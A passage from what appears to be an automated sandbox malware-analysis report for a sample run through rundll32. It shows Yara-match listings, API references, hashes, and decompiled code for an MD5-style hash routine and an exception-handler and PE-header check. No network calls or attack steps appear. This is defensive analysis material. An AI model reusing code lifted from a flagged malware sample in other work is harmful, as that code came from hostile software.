                                            • SetLastError.KERNEL32(00000000,?,05807B0A,00001003,00000000,00000000,00000318,00000020,?,00010003,00001003,?,00000318,00000008), ref: 0581B65C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$LastStatus
                                            • String ID:
                                            • API String ID: 4076355890-0
                                            • Opcode ID: 769dc9cf8d61003b9228c1dc6c62e9fb5f1d7cadb530979f0c4c87a627528990
                                            • Instruction ID: 173e64035324640186eb7f3ccbf4e6f14610fc86def0ef8841e45331b9c541aa
                                            • Opcode Fuzzy Hash: 769dc9cf8d61003b9228c1dc6c62e9fb5f1d7cadb530979f0c4c87a627528990
                                            • Instruction Fuzzy Hash: D4E09A3221521AABDF115EE9AC09D9A7F6DFB18792F008021BE56D2121DB31E8619BB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581C1C2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0581C1EF
                                            • SetLastError.KERNEL32(00000000,?,058028F4,?,?,?,00000040,?), ref: 0581C1F6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$LastStatus
                                            • String ID:
                                            • API String ID: 4076355890-0
                                            • Opcode ID: d177bc6dfcb9efb7c8b1311a701a26d7d53bf46199ad807c057c4fef112992fd
                                            • Instruction ID: 6c9d5183d724d6e32fc698cac16af03d2510cdcb2615881103e9684647b92f60
                                            • Opcode Fuzzy Hash: d177bc6dfcb9efb7c8b1311a701a26d7d53bf46199ad807c057c4fef112992fd
                                            • Instruction Fuzzy Hash: 1BE01A3228421AABCF126EE99C05D8A7F6DFB08641B008022BE01D2120DA31DD60ABB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581C3A9 Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0581C783
                                            • memset.NTDLL ref: 0581C792
                                              • Part of subcall function 058118FC: memset.NTDLL ref: 0581190D
                                              • Part of subcall function 058118FC: memset.NTDLL ref: 05811919
                                              • Part of subcall function 058118FC: memset.NTDLL ref: 05811944
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 4270f02eb92defb9d83c35f2a1f3120725169ebc5706e52a5930cd2b77a8110b
                                            • Instruction ID: 709b258d6ca789e31f7c923a90b91aac01615ae282184df0c07a2866242921d0
                                            • Opcode Fuzzy Hash: 4270f02eb92defb9d83c35f2a1f3120725169ebc5706e52a5930cd2b77a8110b
                                            • Instruction Fuzzy Hash: 68022070541B619FC775CF29C684966B7F9BF54610B205E2ECAE7C6A90D731F881CB08
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F198A Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 49%
                                            			E049F198A(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                            0x049f198d
                                            0x049f1998
                                            0x049f199b
                                            0x049f199e
                                            0x049f199f
                                            0x049f19bd
                                            0x049f19bf
                                            0x049f19c2
                                            0x049f19c5
                                            0x049f19c5
                                            0x049f19c8
                                            0x049f19c8
                                            0x049f19cb
                                            0x049f19cb
                                            0x049f19ce
                                            0x049f19ce
                                            0x049f19eb
                                            0x049f19ee
                                            0x049f1a04
                                            0x049f1a07
                                            0x049f1a21
                                            0x049f1a24
                                            0x049f1a3a
                                            0x049f1a3d
                                            0x049f1a3f
                                            0x049f1a57
                                            0x049f1a5a
                                            0x049f1a5d
                                            0x049f1a75
                                            0x049f1a78
                                            0x049f1a92
                                            0x049f1a95
                                            0x049f1aab
                                            0x049f1aae
                                            0x049f1ab0
                                            0x049f1ac8
                                            0x049f1acd
                                            0x049f1ad0
                                            0x049f1ae6
                                            0x049f1ae9
                                            0x049f1b03
                                            0x049f1b06
                                            0x049f1b1c
                                            0x049f1b1f
                                            0x049f1b21
                                            0x049f1b3c
                                            0x049f1b3f
                                            0x049f1b56
                                            0x049f1b59
                                            0x049f1b5d
                                            0x049f1b76
                                            0x049f1b79
                                            0x049f1b7b
                                            0x049f1b7e
                                            0x049f1b99
                                            0x049f1b9c
                                            0x049f1bb5
                                            0x049f1bb8
                                            0x049f1bc8
                                            0x049f1bcb
                                            0x049f1be3
                                            0x049f1be6
                                            0x049f1c00
                                            0x049f1c03
                                            0x049f1c1b
                                            0x049f1c1e
                                            0x049f1c34
                                            0x049f1c37
                                            0x049f1c4f
                                            0x049f1c52
                                            0x049f1c6a
                                            0x049f1c6d
                                            0x049f1c87
                                            0x049f1c8a
                                            0x049f1ca0
                                            0x049f1ca3
                                            0x049f1cbb
                                            0x049f1cbe
                                            0x049f1cd8
                                            0x049f1cdb
                                            0x049f1cf3
                                            0x049f1cf6
                                            0x049f1d0c
                                            0x049f1d0f
                                            0x049f1d27
                                            0x049f1d2a
                                            0x049f1d42
                                            0x049f1d45
                                            0x049f1d57
                                            0x049f1d5a
                                            0x049f1d6c
                                            0x049f1d6f
                                            0x049f1d81
                                            0x049f1d84
                                            0x049f1d88
                                            0x049f1d98
                                            0x049f1d9b
                                            0x049f1da9
                                            0x049f1dac
                                            0x049f1dbe
                                            0x049f1dc1
                                            0x049f1dd5
                                            0x049f1dd8
                                            0x049f1dda
                                            0x049f1dea
                                            0x049f1ded
                                            0x049f1dff
                                            0x049f1e02
                                            0x049f1e10
                                            0x049f1e13
                                            0x049f1e25
                                            0x049f1e28
                                            0x049f1e2c
                                            0x049f1e3c
                                            0x049f1e3f
                                            0x049f1e51
                                            0x049f1e54
                                            0x049f1e62
                                            0x049f1e65
                                            0x049f1e77
                                            0x049f1e7a
                                            0x049f1e8c
                                            0x049f1e8f
                                            0x049f1ea3
                                            0x049f1ea6
                                            0x049f1eba
                                            0x049f1ebd
                                            0x049f1ed1
                                            0x049f1ed4
                                            0x049f1ee8
                                            0x049f1eeb
                                            0x049f1eff
                                            0x049f1f02
                                            0x049f1f16
                                            0x049f1f1b
                                            0x049f1f2d
                                            0x049f1f30
                                            0x049f1f44
                                            0x049f1f47
                                            0x049f1f5b
                                            0x049f1f5e
                                            0x049f1f74
                                            0x049f1f77
                                            0x049f1f8b
                                            0x049f1f8e
                                            0x049f1fa0
                                            0x049f1fa3
                                            0x049f1fb7
                                            0x049f1fba
                                            0x049f1fce
                                            0x049f1fd1
                                            0x049f1fe5
                                            0x049f1fee
                                            0x049f1ff1
                                            0x049f1ffa
                                            0x049f2003
                                            0x049f200b
                                            0x049f2013
                                            0x049f201d
                                            0x049f2032

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                            • Instruction ID: 12d11b11c4414c86661a04a2090f93c58e9a6aae81bfb66b90c546acfba0f212
                                            • Opcode Fuzzy Hash: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                            • Instruction Fuzzy Hash: 0F22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058184D9 Relevance: 1.9, APIs: 1, Instructions: 611COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: fc750f3eb89d9d2a8a86cca6900e87b20db082a145dca28283854832f4a92147
                                            • Instruction ID: a0d6a0c91544fd626a71021f8de144dfdfda74d2f994990f5dcf349519654759
                                            • Opcode Fuzzy Hash: fc750f3eb89d9d2a8a86cca6900e87b20db082a145dca28283854832f4a92147
                                            • Instruction Fuzzy Hash: 3E22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05820B0E Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: f2c043ff54138350bde66d1f349e41fd6d37549f19fa00b7b88022dec928f800
                                            • Instruction ID: e94af9ab208554befb48d1853e2a582ff4ce3e9566e875083e2b094dbb963366
                                            • Opcode Fuzzy Hash: f2c043ff54138350bde66d1f349e41fd6d37549f19fa00b7b88022dec928f800
                                            • Instruction Fuzzy Hash: 97429E70A04B65CFCB25CF69C4946BABBF2FF49304F24896DD886DB651D334A986CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F8441 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F8441(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x49fa380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x49fa3c8 = 1;
										__eflags =  *0x49fa3c8;
										if( *0x49fa3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x49fa380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x49fa3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x49fa380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x49fa388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x49fa384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x49fa388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x49fa388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x49fa3c8 = 1;
							__eflags =  *0x49fa3c8;
							if( *0x49fa3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x49fa388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x49fa388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x49fa3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x49fa388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x49fa380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x49fa388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x49fa388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                            0x049f844b
                                            0x049f844e
                                            0x049f8454
                                            0x049f8472
                                            0x00000000
                                            0x049f8472
                                            0x049f845c
                                            0x049f8465
                                            0x049f846b
                                            0x049f847a
                                            0x049f847d
                                            0x049f8480
                                            0x049f848a
                                            0x049f848a
                                            0x049f848c
                                            0x049f848f
                                            0x049f8491
